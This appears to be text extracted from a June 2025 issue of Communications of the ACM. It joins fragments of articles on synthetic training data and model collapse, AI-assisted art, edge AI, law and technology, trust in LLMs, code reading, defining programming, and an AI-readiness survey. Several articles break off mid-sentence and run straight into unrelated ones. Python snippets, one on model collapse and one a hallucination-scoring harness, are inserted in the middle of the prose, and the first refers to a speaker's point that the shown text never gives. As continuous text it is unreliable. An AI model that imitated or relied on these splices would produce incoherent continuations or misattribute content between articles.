One challenge is that there is no easy way to tell whether text found on the Internet is synthetic or human-generated. Though there have been attempts to automatically identify text from LLMs, none have been entirely successful. Research into this problem is ongoing, Gal said.

Solving with Curation

There are ways, however, to make the addition of synthetic data less of a problem.

One approach is to curate the synthetic data to make sure it is of good quality. Some curation happens naturally, Gal said; people do not post everything their chatbot creates to the Internet, weeding out the material that contains false information or simply does not make sense, so that improves the training set.

Curation can also be a deliberate process to make sure high-quality data goes into a training set. Feng, for instance, has experimented with asking the LLM to assess the quality of its own output. LLMs naturally select the words they think have the highest probability of fitting into a context. In doing so, they internally generate a score rating how confident they are that they are pairing the best words together. That same mechanism can be used to assess already-generated text to rate its quality, with low-scoring results removed or the highest-scoring result of several attempts selected as the best. The idea is similar to a method used to fine-tune LLMs called reinforcement learning from human feedback (RLHF), in which people provide examples of good results, thereby pushing the models toward producing similar results. In this case, though, the LLM is generating its own feedback.

How well that works varies by case, Feng said. The feedback can be improved by having other LLMs assess the same text and combining the results from different models. Including human assessments also improves the outcomes, as does applying some pre-written rules about what the output should look like. Eliminating lower-quality results from the synthetic
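Gal's point about vanishing tail events can be demonstrated numerically. The toy simulation below is an illustration of the statistical effect, not the methodology of the Nature study, and all names in it are invented for the example: each "generation" re-fits a categorical token distribution to a finite sample drawn from its predecessor, and the number of surviving tokens is tracked.

```python
# Minimal model-collapse demo: each generation is a categorical
# distribution re-estimated from a finite sample of the previous one.
# A token missing from the sample gets probability zero and never returns.
import random
from collections import Counter

def collapse(vocab_size=200, sample_size=300, generations=10, seed=1):
    rng = random.Random(seed)
    tokens = list(range(vocab_size))
    # Zipf-like initial distribution: a few frequent tokens, many rare ones.
    weights = [1.0 / (i + 1) for i in tokens]
    support = []
    for _ in range(generations):
        sample = rng.choices(tokens, weights=weights, k=sample_size)
        counts = Counter(sample)
        weights = [counts[t] for t in tokens]    # re-fit from the finite sample
        support.append(sum(1 for w in weights if w > 0))
    return support

surviving = collapse()
```

Because a token that receives zero weight can never be sampled again, the support of the distribution can only shrink: probability mass concentrates on the head of the distribution, which is the collapse dynamic described above.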
AI and Art
If artificial intelligence is used to produce artworks,
should it be considered an artist?
ARTIFICIAL INTELLIGENCE (AI) increasingly is finding its way into art and has become a hot-button topic. Artists from all mediums emphatically support the use of
AI, saying it augments and enhances
their work, expanding what is possible.
They are unequivocal that they are still
the creators of their work and the AI is
not—but believe artists and technolo-
gy must learn to coexist harmoniously.
The reasons to use AI in different art
forms are compelling. A 2024 study by
the U.K.’s University College London
and University of Exeter found that
stories written with help from AI were
more creative, better written, and more
enjoyable. The research indicated that
writers with the most access to AI ex-
perienced the greatest creative gains,
with their stories scoring 8.1% higher
for novelty and 9% higher for useful-
ness than stories written without AI.
Deciding how to position AI in art is
in the eye of the beholder.
AI as an Extension of the Artist

Artist Hugh Leeman used AI-generated images as photo references to paint from in his Change is Here series; this image is one of the results.

AI is composed of two ingredients: algorithms and data, and “both of these are man-made,” said Tony Fernandes, founder of HumanFocused.AI and CEO of UEGroup, a design company that employs artists.

“People are fascinated to see what happens when both are allowed to run on their own and to look at what they generated,” Fernandes said, adding that creating art requires inherent human influence.

“To say that AI creates art is to say that anyone can replicate the work of Picasso,” he said. “What makes Picasso’s work relevant is the human spirit, imagination, and desire for expression. Picasso experimented with cubism to achieve something new. AI has no such motivation.”

None of the AI processes have spawned an entirely new art movement, Fernandes noted, “because it isn’t creative and it isn’t art. It is just software working through logic and probability imitating its master in the only way it knows how: shallow imitation.”

Hugh Leeman, an artist who lectures regularly at Johns Hopkins, Duke, and Colorado State universities, is using AI in the visual arts. In his studio art practice, Leeman has created a body of work where half of the paintings are made directly from his imagination, thus representing human creativity. AI was used to create images for the other half of the paintings. Leeman then made photo-realistic paintings based on those AI-generated images, representing machine creativity.

“The idea is that the viewer cannot discern the difference between which paintings were made from my imagination and which ones were made based on my making realistic oil paintings that are copies of AI-generated images,” he explained. “This body of work is meant to ask the viewer to consider the blurred boundaries between what is human and what is machine, or what is natural and what is artificial.”

The technology has enhanced the potential to create and collaborate in new ways, while raising questions that allow viewers to reflect on the current changes in our world, Leeman said.

Leeman is clear that AI is “not yet an artist because it is not sentient. It lacks emotions around pain, fears, and fantasies, but it does offer us an incredible opportunity to collaborate with an ever-growing ocean of images and possibilities. AI is becoming an extension of the artists and their creativity in ways that will only become clear as we
erations “will likely lose elements of agency of their creativity through the further merging of AI with humans in our social ecosystem as well as our physiology.”

creativity. Anil Doshi, one of the study’s authors, said that while the findings indicate increased individual creativity, “There is [the] risk of losing collective novelty. If the publishing industry were to embrace more generative AI-inspired stories, our findings suggest that the stories would become less unique in aggregate and more similar to each other.”

Should AI Art Be Copyrighted?

Alongside the discussion over AI’s role in art, there is a “gap” because the technology is evolving faster than the regulations and frameworks that govern it, particularly when it comes to intellectual property and authorship, said Peker.

She noted that the U.S. Copyright Office, for example, does not allow AI-generated works to be copyrighted, since only humans can hold copyright and the AI is not a human.

“Even though AI cannot create art itself and requires a human to author the prompts to generate visuals, the unpredictability of AI’s output challenges the idea that these works can be truly ‘authored’ by the individual who inputs the prompt,” Peker said. “This lack of legal clarity leaves a significant gray area in determining who the artist is, and more importantly, how to protect creators’ rights.”

This is an issue being faced by Colorado Springs, CO, artist Jason Allen, who caused a stir when he submitted

become more blurred by the day, if not entirely indistinguishable, said Leeman. “Consider the profound power of art. Be it visual art or writing, its power relates to society’s ability to construct and shape our perceptions of reality.” At some point, Leeman said, we must address the question of what will happen when humans are no longer the sole creators of the images and stories that shape our perceptions of reality.

Peker believes AI art will become “even more interesting as artists and engineers collaborate on deeper, more meaningful ways to use the technology. Imagine dynamic art that evolves with real-time data or interactive pieces where the artist and machine work together in an almost symbiotic relationship.”

Perhaps the most practical way to think about AI and the arts is to consider the adage “If you can’t beat them, join them.” Rather than viewing AI-produced art as a threat, “We should see it as a tool for empowering human creativity,” says Jeffrey “digitaljeff” Castillo, a futurist, tech entrepreneur, and filmmaker. “AI may produce artificial art, but tapping into human imagination and emotion will always yield the most poignant, culturally relevant works,” Castillo said. “The future of art depends not on AI vs. humans, but on integrating our creative gifts to push new frontiers of artistic expression.”

Further Reading

Doshi, A.R. and Hauser, O.P. Generative AI enhances individual creativity but reduces the collective diversity of novel content. Science Advances, July 2024; https://tinyurl.com/2ctftb4w
THIS YEAR, U.S. rail carrier Amtrak will be installing two novel inspection gateways from Duos Technologies along its busy Northeast Corridor. The barn-like Duos
structures straddle railway tracks;
as passenger trains speed through
at up to 125 mph (201 kph), 97 cam-
eras and dozens of LED lights arrayed
around the sides, top, and bottom of
the tracks will capture thousands of
high-resolution images of the railcars.
These images are aggregated and pro-
cessed onsite in real time to present
a complete, 360-degree, highly de-
tailed view of the train. Artificial in-
telligence (AI) algorithms running on
Nvidia GPUs will analyze the images
locally; if the model flags a potential
structural or mechanical flaw, train personnel will be notified in less than a minute.

The Duos portal aggregates and processes images from its 97 cameras onsite in real time, providing a highly detailed view of each train passing through it.
The Duos portal is one of many new examples of what is loosely categorized as edge AI, or the deployment and operation of AI models outside of massive cloud datacenters.

The precise definition of what constitutes an edge varies. “There’s a spectrum, from telecommunications points of presence in major cities to smartwatches, smart home devices, and Meta Ray-Bans,” says Shishir G. Patil, a Ph.D. student in computer science at the University of California, Berkeley. “They all come under this pretty broad category of edge devices.”

Operating AI models at the edge is challenging for a number of reasons.

AI processors, like the on-device versions from Qualcomm or those from Hailo Inc., allow for real-time intelligent decision making, and there are multiple privacy and security benefits to edge processing. These and other factors have everyone from academic computer scientists to technology giants racing to develop more efficient means of pulling AI out of the cloud and closer to users.

There is computational capacity available all the way from local devices to the cloud, explained distributed AI researcher Lauri Lovén at the University of Oulu in Finland. Exactly where an AI model operates along this edge-cloud continuum depends in part on the use case. An autonomous vehicle that has to make a rapid, real-time traffic decision is better off eliminating the cloud latency and generating that result onboard. Conversely, a consumer photo-editing application powered by AI does not necessarily need to run on the user’s personal device—a latency-induced lag resulting from spotty bandwidth would be per-
can answer most of your questions, but then maybe there’s one that needs to be solved by someone outside the classroom.” A more complex problem or task could be pushed to a more robust AI model in the cloud for resolution.

Singh cites security and privacy as equally important variables. If a patient visits a local health center for a checkup, and machine learning algorithms can process data collected during the exam within that facility, then privacy concerns are minimized. “If that patient data is stored and assessed locally, and not going to the cloud, that sensitive information remains secure,” he explained.

Economics have become increasingly important as well. A personalized AI agent that understands your preferences might be too expensive to operate in the cloud, noted Berkeley’s Patil, because this would require reserving high-end cloud compute capacity just for the individual user, who would have to pay the compute costs to keep the model ready even when it is not in use. On the other hand, the costs of a general AI model maintained in the cloud for mass consumption can be distributed more efficiently across all its users. As a result, Patil and his colleagues are developing techniques to shrink, fine-tune, and personalize models so they can run on consumer hardware like smartphones and other edge devices.

The cost of operating the models in the cloud is also incentivizing AI leaders and cloud giants to push more tasks out to the edge, explained Patil. As advanced AI models grow larger, they consume more electricity and drive up the price of each inference. The most advanced large language models (LLMs) are one obvious example, according to Patil. “LLM inference today is super expensive,” he said. “It’s in the tens of cents per inference, if not higher, especially for the bigger models. Basically, the cloud providers are going to be bleeding money if they give away inferences for free.” But if AI tools operate on edge devices like smartphones, the cloud provider will assume less of the electricity bill. Instead, the user will pay that cost by charging their phones more often.

The latest smartphones—considered the extreme edge—are now being optimized for edge AI. The recently released Pixel phones incorporate new Google Tensor G4 chips designed specifically for AI workloads. The models running on these phones are also shrinking. When Apple announced its Apple Intelligence features, the company noted that the language model running on the device would have roughly 3 billion parameters, compared to cloud-based models that run to hundreds of billions or even a trillion-plus parameters. Similarly, Meta’s Llama 3.2 release included lightweight models with one billion and three billion parameters designed to run on devices.

These smaller, purpose-built models are far more suitable to the edge. An advanced generative text-to-video model like OpenAI’s Sora requires significant cloud compute capacity,
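The parameter counts above translate directly into memory footprints, which is one reason on-device models must be small and heavily quantized. A back-of-the-envelope sketch follows; the bytes-per-parameter figures are standard numeric precision sizes, and the 175-billion-parameter cloud model is a hypothetical example for scale, not a figure from the article.

```python
# Rough memory footprint of model weights at different numeric precisions.
# bytes per parameter: fp32 = 4, fp16/bf16 = 2, int8 = 1, int4 = 0.5

def weight_gb(params: float, bytes_per_param: float) -> float:
    """Weight storage in decimal gigabytes (activations and KV cache excluded)."""
    return params * bytes_per_param / 1e9

on_device = weight_gb(3e9, 2)      # a ~3B-parameter model at fp16 -> 6.0 GB
quantized = weight_gb(3e9, 0.5)    # the same model quantized to int4 -> 1.5 GB
cloud     = weight_gb(175e9, 2)    # a hypothetical 175B cloud model -> 350.0 GB
```

Even quantized, a 3B-parameter model consumes a meaningful share of a phone's RAM, while the weights of a hundreds-of-billions-parameter model simply do not fit on consumer hardware.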
opinion
Inside Risks
Computer Science
and the Law
Making a case for stronger influence and
overlap of technology and law.
THERE WERE THREE U.S. technical/legal developments occurring in approximately 1993 that had a profound effect on the technology industry and on many technologists. More such developments are occurring frequently.

The three developments were technically unrelated. One was a bill before the U.S. Congress for a standardized wiretap interface in phone switches, a concept that spread around the world under the generic name “lawful intercept.” The second was an update to the copyright statute to adapt to the digital age. While there were some useful changes—caching proxies and Internet service providers (ISPs) transmitting copyrighted material were no longer to be held liable for making illegal copies of protected content—it provided an easy way for careless or unscrupulous actors, including bots, to request takedown of perfectly legal material. The third was the infamous Clipper chip, an encryption device that provided a backdoor for the U.S.—and only the U.S.—government.

All three of these developments could be and were debated on purely legal or policy grounds. But there were also technical issues. Thus, one could argue on legal grounds that the Clipper chip granted the U.S. government unprecedented powers, powers arguably in violation of the Fourth Amendment to the U.S. Constitution. That, of course, is a U.S. issue—but technologists, including me, pointed out the technical risks of deploying a complex cryptographic protocol, anywhere in the world (and many other countries have since expressed similar desires). Sure enough, Matt Blaze showed how to abuse the Clipper chip to let it do backdoor-free encryption, and at least two other mechanisms for adding backdoors to encryption protocols were shown to have flaws that allowed malefactors to read data that others had encrypted.

These posed a problem: Debating some issues intelligently required not just a knowledge of law or of technology, but of both. That is, some problems cannot be discussed purely on technical grounds or purely on legal grounds; the crux of the matter lies in the intersection.

Consider, for example, the difference between content and metadata in a communication. Metadata alone is extremely powerful; indeed, Michael Hayden, former director of both the CIA and the NSA, once said, “We kill people based on metadata.” The combination of content and metadata is of course even more powerful. However, under U.S. law (and the legal reasoning is complex and controversial), the content of a phone call is much more strongly protected than the metadata: who called whom, when, and for how long they spoke. But how does this doctrine apply to the Internet, a network that provides far more powerful abilities to the endpoints in a conversation? (Metadata analysis is not an Internet-specific phenomenon. The militaries of the world have likely been using it for more than a century.) You cannot begin to answer that question without knowing not just how the Internet actually works, but also the legal reasoning behind the difference. It took more than 100 pages for some colleagues and me, three computer scientists and a former federal prosecutor, to show how the line between content and metadata can be drawn in some cases (and that the Department of Justice’s manuals and some federal judges got the line wrong), but that in other cases, there is no possible line.1

Newer technologies pose the same sorts of risks. Consider today’s hottest technology, generative AI. What are the implications for copyright law if a system has to be trained on more or less everything available on the Internet? Does the Berne Convention cover it? Who is liable if an erroneous answer (sometimes incorrectly called a “hallucination”) libels someone? I have repeatedly asked one such system for my biography. It has consistently gotten information wrong—including my major, alma mater, year of graduation, published books, and more—even though that information is readily available on my own website. Others have had similar experiences. This was only laughable, not defamatory—but what if it were libelous?

Many issues involve international law or conflicting laws between different jurisdictions. How does one balance freedom of speech, a core U.S. value, with the very understandable desire to ban pro-Nazi speech in much of Europe? Who should reconcile the different legal standards? What should ISPs do? What is the effect on everyone else, if, say, a search engine in a NATO country decides it has to suppress information on Tank Man at Tiananmen Square, but perhaps only in certain countries? How do those policies in turn interact with virtual private networks, content distribution networks, and more? How do those location-sensitive answers interact with privacy legislation?

There are many more very difficult questions at the border of law and technology. Is Internet voting a good idea? There are obvious technical risks, but there is the social good of increasing turnout and the technical challenge of preserving ballot secrecy. There is also the technical ability for people to verify their vote was counted, but only if sophisticated cryptographic methods are used to cast votes. Computer crime? What is unauthorized access? Does iterating through sequence numbers in a URL violate the law? How unpredictable must customer IDs be? Is cryptanalyzing a bad pseudorandom number generator illegal? Should it be, if that ability is used to gain access to customer profiles and thus to violate their privacy? How bad must that generator be, if cracking it is to be legal?

The risks can be civil. I know of an incident where a corporate takeover was stymied because the lawyers involved did not understand IP address-based geolocation. That is, their lack of technical knowledge caused them trouble, and they were not even aware of what they did not know.

All of these questions pose considerable risks to society. Lawyers alone cannot answer them; for the most part, they do not know the technology. But technologists alone cannot answer them, because for the most part they do not know the law. Besides, the Internet and other forms of technology are international; what is legal in one place may not be in another—and how to find the boundary in a service offering is itself a difficult question. We need people who understand all of this. More significantly, we need people who can keep current in both fields, because both change.

There is progress. There are annual legal workshops on privacy and cybersecurity; they welcome technical papers, too. Communications publishes the Legally Speaking column by Pamela Samuelson and the Law and Technology column by James Grimmelmann on important legal developments; in addition, ACM conducts a regular conference (Symposium on Computer Science and the Law). But the challenge remains: educating people who understand not just technology, but also law, policy, ethics, and all in an international context. (For part of that, a broad, liberal education is necessary.) Combined majors will help, but for many students it is difficult to fit in enough courses in both fields. That said, without such people, we are all at the mercy of systems mandated by well-meaning legislators who do not understand the technical risks of their proposals.

Reference
1. Bellovin, S.M., Blaze, M., Landau, S., and Pell, S. It’s too complicated: How the Internet upends Katz, Smith, and electronic surveillance law. Harvard J. of Law and Technology 30, 1 (Autumn 2016); https://bit.ly/4iBIf6p

Steven M. Bellovin ([email protected]) is a professor of computer science and affiliate law faculty at Columbia University, New York, NY, USA.

© 2025 Copyright held by the owner/author(s).
The Profession of IT
In Large Language Models
We Trust?
Can large language models be trusted? Not likely.
Artificial neural networks offer a much better option.
“IF EVERYBODY ALWAYS lies to
you, the consequence is not that
you believe the lies, but rather
that nobody believes anything
any longer.” These words were
spoken by the political scientist and
philosopher Hannah Arendt in 1974.
She was discussing how totalitarian
governments, through their propagan-
da, might induce such wide cynicism
that people lose faith in the truth. Her
words resonate with today’s fears about
the dangers of rampant disinformation
generated by large language models
(LLMs) and spread by social media.
Today’s worry is not of a totalitarian
government, but a drift into a society
where people do not know what is true
and lose their trust in each other and in
the institutions that were established
to preserve stability. I offer here some reflections on trust and truth in the Internet with the aim of developing defenses against this drift.

Trust
In our social relations, trust means we believe a person will act with competence, sincerity, and care. Suppose I trust you. The competence assessment supports my belief you have the skills and resources to do the job you promised. For if I doubt your skills or resources, I will not trust your promise. The sincerity assessment supports my belief you intend to fulfill your promise. For if I doubt your intent, I will not trust your promise. The care assessment supports my belief you will honor our relationship, keeping me informed of any needed changes in our agreements and going out of your way to fulfill them should a challenging breakdown occur.

These three assessments are grounded in the history of our promises to each other. In his book, Seven Habits, Stephen Covey discusses the Emotional Bank Account. Each fulfilled promise or act of kindness is a deposit. Each broken promise or insensitive act is a withdrawal. Betrayals are expensive and damaging: It takes only one or two to kill the trust earned over many deposits. Unfortunately, by reducing trust to the effects of transactions, this metaphor hides the essence of trust, which is that the parties take care of their relationship. If something comes up that would violate their expectations, they talk to modify their expectations to fit the new circumstance. They will go to extraordinary lengths to

JUNE 2025 | VOL. 68 | NO. 6 | COMMUNICATIONS OF THE ACM 23
opinion
meet their expectation if a contingency or emergency arises.

Many relationships, such as new ones or interactions via a website, must work at a low-trust level. Low-trust parties have a mutual agreement to follow basic transactional rules with precise protocols for requests, promises, and declarations. Consider a purchase transaction with a merchant. The merchant offers a service at a price (declaration). The customer asks the merchant to perform the service (request) and agrees to make the payment (promise). After the service is complete, the customer ends the transaction with an acceptance (another declaration). After several successful transactions, the customer and the merchant develop a mutual confidence that the other will do their part. A higher-trust relationship emerges. Now the merchant lets the customer delay a payment or receive a customized service. A relationship can evolve to high-trust when the competence and sincerity assessments are taken for granted, and the belief that the other will take care becomes unconditional.

Taking It to the Machine
We take this understanding of trust to machines by mapping the assessments into testable metrics. A machine that passes all the tests is called trustworthy. Competence maps to tests that a machine meets all its technical specifications; the machine is competent if it behaves properly on every use and, in case of failure, degrades gracefully. Sincerity maps to tests that the machine's builders have kept their word on the machine's functions, have been transparent about the development process, and have a following of satisfied customers. Care is different. We cannot map care to machines because they cannot care at all.

This means we use machines in a low-trust mode, as enactors of transactions, without presuming that the machine cares about any transaction or any customer. Machines can be very useful even if they do not care about us. We take great pains to learn the machine's "safe operating range"—when it behaves according to expectation and when it is likely to fail or generate errors. Chip-making provides an example. Chips are tested for their error rates as the clock speed is increased. Their specs warn against running the clock too fast. Well-engineered machines are likely to be trustworthy in their operating ranges.

LLMs challenge this standard engineering practice. The problem is "hallucinations"—responses that contain errors or fabrications, often presented as authoritative statements. Hallucinations appear to be inherent in LLMs. LLMs have no means to verify that statements they generate are true. Users are left to determine for themselves, from other information available to them, whether an LLM output is truthful. To date, researchers have been unable to define "safe operating ranges" for LLMs or to find internal constraints that eliminate hallucinations. It seems unlikely that anyone is going to find restrictions on prompts that guarantee hallucination-free responses. It is more likely that, through extensive testing, an LLM can be rated with a hallucination likelihood. Early experiments of this kind show the hallucination rate can sometimes be driven down to approximately 15%, which is still too high for critical applications.

How does a human know when an LLM hallucinates? Sometimes it is obvious because the LLM response makes no sense in the context of what the human knows. More often it is not obvious—for example, when an LLM makes a claim and gives nonexistent citations. In those cases, the human must consult other sources, for example a Google search, seeking corroborating or refuting evidence. But searching the Web for truth is problematic. Much information is incorrect and has been absorbed into the LLM when it is trained. In addition, Google searches now respond with an "AI summary" which, because it was generated by an LLM, might contain hallucinations.

My colleague Espen Anderson (University of Oslo) has suggested evaluating trust in the context of the kinds of jobs LLMs can do. When would you hire (pay money for) an LLM to do a job? LLMs can do three kinds of jobs: conversation, distillation, and fabrication. These distinctions can help focus when I am willing to trust an LLM. I might trust an LLM to have a companionate conversation with me, but not to provide accurate biographical information about someone. I might trust an LLM to make a useful summary of a book, but not to generate an accurate transcript of my session with a doctor. I might trust an LLM to generate interesting new images, but not to prevent deepfakes.

Truth
Trust issues with LLMs bring us to deeper and more difficult questions. What is truth? Can we test whether a claim is true? How does science do this? Science has evolved rigorous approaches to determining what is true about nature. A good treatment of this dynamic process can be found in the 1987 book Science in Action,a by the philosopher Bruno Latour.

Latour's main claim is that a hypothesis moves from its birth as a speculation or hunch to maturity as a settled scientific fact by a social process of accumulating allies. An ally is a person who accepts the claim. Over a period of experimentation and debate, the claim gains followers and loses dissenters. Claims that cannot withstand the assaults of doubters are discarded. Science has developed rigorous standards for when experimental results support claims. And, of course, any settled claim is falsifiable—it can be reopened if new, contrary evidence surfaces. In other words, scientific truths are socially constructed as the scientific community tests claims and comes to agreement that they hold.

Some scientists are uncomfortable with Latour's claim that scientific facts are socially constructed. Science is sup-

a See B. Latour, Science in Action: How to Follow Scientists and Engineers Through Society. Harvard University Press, Cambridge, MA (1987).
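The rating approach described earlier, in which an LLM is scored with a hallucination likelihood through extensive testing, can be illustrated with a toy grading harness. Everything here is hypothetical: `ask_llm` stands in for a real model call, and the two-question reference set is far too small for a meaningful rate.

```python
# Hypothetical sketch: estimating a hallucination likelihood for an LLM
# by grading its answers against a small reference set. The names
# ask_llm and REFERENCE_QA are illustrative placeholders, not a real API.

REFERENCE_QA = [
    ("Who wrote 'Science in Action'?", "bruno latour"),
    ("What year did Hannah Arendt give the quoted interview?", "1974"),
]

def ask_llm(question: str) -> str:
    # Stand-in for a real model call; returns canned answers here,
    # one of which is deliberately wrong (a simulated hallucination).
    canned = {
        "Who wrote 'Science in Action'?": "Bruno Latour",
        "What year did Hannah Arendt give the quoted interview?": "1964",
    }
    return canned[question]

def hallucination_rate(qa_pairs) -> float:
    """Fraction of answers that fail a simple ground-truth check."""
    wrong = 0
    for question, truth in qa_pairs:
        answer = ask_llm(question).lower()
        if truth not in answer:
            wrong += 1
    return wrong / len(qa_pairs)

rate = hallucination_rate(REFERENCE_QA)
print(f"estimated hallucination rate: {rate:.0%}")  # 1 of 2 wrong -> 50%
```

A real harness would need thousands of fact-checkable questions and far more robust answer matching than substring comparison, but the principle is the same: sample outputs, grade them against ground truth, and report the failure fraction.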
Kode Vicious
Analyzing Krazy Kode
Accounting for the emotional state of the person who wrote that code.
Dear KV,
Sometimes, when I am reading other
people’s code, I almost feel I can hear
what they were thinking. But then,
sometimes, it seems what they were
thinking was completely alien, or pos-
sibly even insane. Considering that
computer languages are more con-
strained than human ones, I am sur-
prised at the wide variation in the code
I am exposed to, even within the same
company or group.
Somehow, I thought that—with
things like modern coding standards—
code would start to look more alike, but
that seems to be all form and not func-
tion. How do you deal with all the vari-
ous codebases you must be exposed to?
Variously Confused
Dear Variously,
While recent languages that dictate the form of the code—and here I am thinking about Go and, to some extent, Rust—can enforce some visual similarity, the process of reading someone else's code is probably still more akin to psychoanalysis. This applies as well to systems that reformat the visual representation before the code is committed for C and C++. KV often wonders if code annotations from the DSM-5 (Diagnostic and Statistical Manual)a would be appropriate in a code review.

It is true that code can tell you a lot about a coder, including their age, what language they write in most often, and their emotional state when the code was written. If you doubt me, go back and look at your own code and think back on how you felt when you wrote it.

Anyone reading KV code will see that it continues to be tinged with the sins of his past writing in assembler (do this, then this, then this) and C, which remains his day-to-day language. That is because KV's angry code has a staccato feel to it—lots, of, short, variables, and comments. KV long ago learned not only to check the spelling of his comments but also to see if there were any other things that might cause future embarrassment.b

KV's only emotion besides anger is calm, and calm code has a more playful feel. Variables and functions are named logically, of course, but they may also contain a bit of whimsy, along with comments written in full, grammatically proper sentences.

Why should it matter if the code was written when you were sad, mad,
Opinion
What Is Programming?
... and what is programming in the age of artificial intelligence?
TWO YEARS AGO, when visiting research colleagues in Uppsala, Sweden, we were asked a deceptively simple question: “What does it mean
to program?” For context, one of us had
just completed academic education
and training in computer science and
was already deeply involved in actually
teaching introductory programming
(CS1). Arguably, he was (and still is) ca-
pable of programming. The other com-
pleted his Ph.D. degree in 2003 and has
been teaching programming (in various
forms) ever since. Yet, the question took
us by surprise; after all: “What is pro-
gramming?” To the reader, it may ap-
pear a ridiculous question to ask for two
reasons. You may find yourself having
a very clear and succinct definition and
conceptualization of (the idea of) programming. Or, you may question what value it brings to discuss such a trivial question.

However, we believe the answers to this question may shed light on the future of programming in the age of generative artificial intelligence (AI). We approach an answer to the question by an exploration of the history of computing as well as opinions among contemporary introductory programming educators.

In Theory, Programming Is ...
Alan Blackwell's work takes us through the historical definitions of programming.1 Initially, it is presented as the process of drawing up the "schedule" for the sequence of individual operations required to carry out a calculation. Later definitions expand this to the process of translating from a language convenient for humans to a language convenient for the computer. If we, as a community, adopt these narrow definitions, the entirety of programming may well be made redundant by the ceaselessly growing capabilities of generative AI. However, during the 1970s, Donald Knuth, and similarly Edsger Dijkstra, argued programming was something more.2,4 They argued programming was the "art" of composing programs, which requires awareness of aesthetics, use of ingenuity, and inherent creativity. From this perspective, programming is more about composing pieces of code to solve a problem rather than writing individual lines of instructions. In 1985, Peter Naur further nuanced the view of programming for problem solving.6 Specifically, he argued that a program's "life" depends on its developers fostering an understanding of how it [the program they develop or maintain] supports the matters at hand; that is, an understanding of the "problem domain." Thus, programming is not simply what is manifested as program code; it is also the knowledge of how the program interacts and develops alongside the domain of the problem. Recently, Amy Ko et al. have taken this further and argued for the need to also consider the societal impact of our programs, including limitations, biases, and ethical considerations embedded within the programs.5 Thus, one can reduce programming to the act of writing instructions, but when taking the art and context into consideration, it becomes more about the process of composing and constructing something that, in a sense, exists within a domain. Thus, current definitions both encapsulate the act of writing programs and the surrounding ingenuity of composing pieces to solve problems.
a Obtained from a publicly available educational program repository: https://ug.dk
b For example, inductively identified keywords such as "problem-solving" or "computer."
c Please note definitions are coded to multiple categories as they express multiple attributes.
Programming in the Age of AI Is ...
While the definitions in literature clearly emphasize the more impalpable qualities of programming, educators

References
1. Blackwell, A.F. What is programming? In Proceedings of the 14th Workshop of the Psychology of Programming. Citeseer (2002).
2. Dijkstra, E.W. A Short Introduction to the Art of Programming. Vol. 4. Technische Hogeschool Eindhoven (1971).
Opinion
Thoughts about Some
Surprising AI-Era Technology
Readiness Findings
Nine steps can help spotlight, clarify, and
address risky digital governance gaps.
WITH THE ASSISTANCE of Arthur D. Little and the Cutter Consortium, we surveyed business executives about their business-technology plans, readiness, and priorities.a The results surprised us—a lot. We learned that nearly 80% of the companies still believe in some form of the central control of technology, and that only 5% of the companies are decentralized, where the lines of business are free to pursue technology initiatives on their own. Slightly more than half of the surveyed companies do not track emerging technologies or maintain technology watch lists. Innovation? Only 17% of companies have a well-funded, well-defined innovation strategy, and 34% have no innovation strategy at all.

What about artificial intelligence (AI)—the technology driving major changes in business models and processes? We discovered that only 20% of companies define AI initiatives as high priority. Approximately 77% said they had only looked at generative AI (GenAI) briefly or not at all, and only 26% of companies believe they are "ready" for AI. We assumed there was more interest in AI than meets the eye, but the survey revealed that 27% of board directors have little or no interest in AI, and 73% of boards have little or no interest in technology strategy. The survey data revealed 30% of the respondents are in technology, 37% in senior management, and 14% in consulting. The majority of respondents are in technology consulting (12%), financial services (12%), management consulting (10%), and higher education (8%). Expressed a little differently, the survey was representative across industries and executives.

a More than 70% of the 150+ respondents held senior positions, such as CEOs, CIOs, CFOs, CTOs, SVPs, EVPs, and senior IT management. The majority of the respondents were from North America (54%); Europe was second (24%). The industries that responded the most were financial services (15%) and computer consulting (13%). Beyond that, there was representation across many verticals split almost evenly—40% of the companies have revenue of $1M–$50M and more than 20% have revenue more than $50M; 30% have revenue exceeding $1B; and 8% have revenue more than $50B.

Analysis and Interpretation
Like so many of us in the business-technology world, we are accustomed
to failure. As we all know, technology projects fail at astonishingly high rates.4,5 The massive enterprise resource planning (ERP) business—$75B by 2030—routinely experiences failure—with the well-known Gartner Group's failure rate estimate at 75%.2 Customer relationship management (CRM) programs fail at nearly the same rate.3 Perhaps the harshest finding is that "90% fail to deliver any measurable ROI."1 But despite high rates of failure, companies must leverage emerging technology as the power of these technologies continues to rise. While it was not one of the survey questions, we believed that the frequency of technology project failures would drive more progressive approaches to business-technology optimization. We expected to see survey results that were "modern," and at least tacitly acknowledged that it's time to do better.

But the data suggests many companies still view technology as a business tool rather than an enabler of competitive advantage. Particularly surprising were results observed in technology adoption and awareness, cybersecurity, innovation, and board readiness, where we observed technology awareness and commitments were much more tepid than anticipated, especially in the age of AI. Most companies are struggling to articulate AI plans, as responses do not describe AI as a strategic differentiator or an investment priority. Similarly, companies do not see innovation as a priority, despite how many companies claim to be innovation leaders.

None of this suggests companies have learned enough lessons from past experiences. Despite problems with the optimization of technology, survey results suggest the learning curve is fairly flat. Companies frequently say that "technology" is an important part of their strategy and tactics. Approximately 75% of them also say that technology is "essential to their competitiveness over the next 5–7 years." But when asked about "readiness" to leverage emerging technologies over the same period, over 75% answered "moderate" or "low."

Organizational analysis. Respondents also revealed some organizational structure and IT oversight mismatches. Over 65% of respondents indicated that their companies still manage technology functions centrally, and only 14% shared technology management with the lines of business. These results indicate that nearly 80% of the companies relied on traditional "command and control" centralization to manage the IT function.

There is some good news. In almost 70% of the companies, the CIOs and CTOs report directly to the CEO. It appears that the days of IT reporting to CFOs (only 10%) and COOs (12%) are over. This news is mixed, however, since reporting to the CEO reinforces centralized management, which has huge implications for innovation.

Technology adoption. The data also suggests the majority (51%) of companies—including the ones that regard technology as strategic—do not have defined processes in place for adopting new emerging technology. This is an extraordinary—and dangerous—"wait-and-see" mind-set. The data also suggests only 29% describe themselves as innovators or early technology adopters. This tracks with the lack of defined innovation processes and the inability to be technologically agile.

The data suggests the vast majority (70%) of companies see technology solutions as requirements-driven, not technology-driven (12%). Inexplicably, 14% answered "neither" or "not sure." While a requirements-first approach to technology investment sounds prudent, it's important to remember that many technology solutions are "discovered" by prototyping and the encouragement of so-called "science projects" where technologies—especially AI—are "product tested" before they are assigned for duty. The insistence on old approaches to modern technology spending is risk multiplying. The data reflect antiquated attitudes and practices that limit companies' odds to deploy and leverage emerging technologies.

